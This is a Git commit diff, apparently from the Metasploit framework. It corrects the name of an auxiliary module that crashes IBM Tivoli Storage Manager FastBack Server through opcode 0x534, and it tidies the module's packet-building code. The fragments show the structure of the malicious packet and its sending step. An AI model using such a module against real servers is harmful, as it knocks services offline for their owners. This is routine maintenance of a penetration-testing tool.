Land #6590, fix title for IBM Tivoli Storage Manager DoS

bug/bundler_fix
Brent Cook 2016-02-18 16:08:08 -06:00
commit 6d5217b906
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 4 additions and 4 deletions

View File

@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize(info={})
super(update_info(info,
'Name' => " Server Opcode 0x534 Denial of Service",
'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
'Description' => %q{
This module exploits a denial of service condition present in IBM Tivoli Storage Manager
FastBack Server when dealing with packets triggering the opcode 0x534 handler.
@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary
print_status("Sending malicious packet")
p = tv_pkt(target_opcode,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
p2 = Rex::Text.rand_text_alpha(0x60),
p3 = Rex::Text.rand_text_alpha(0x60)
"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
Rex::Text.rand_text_alpha(0x60),
Rex::Text.rand_text_alpha(0x60)
)
sock.put(p)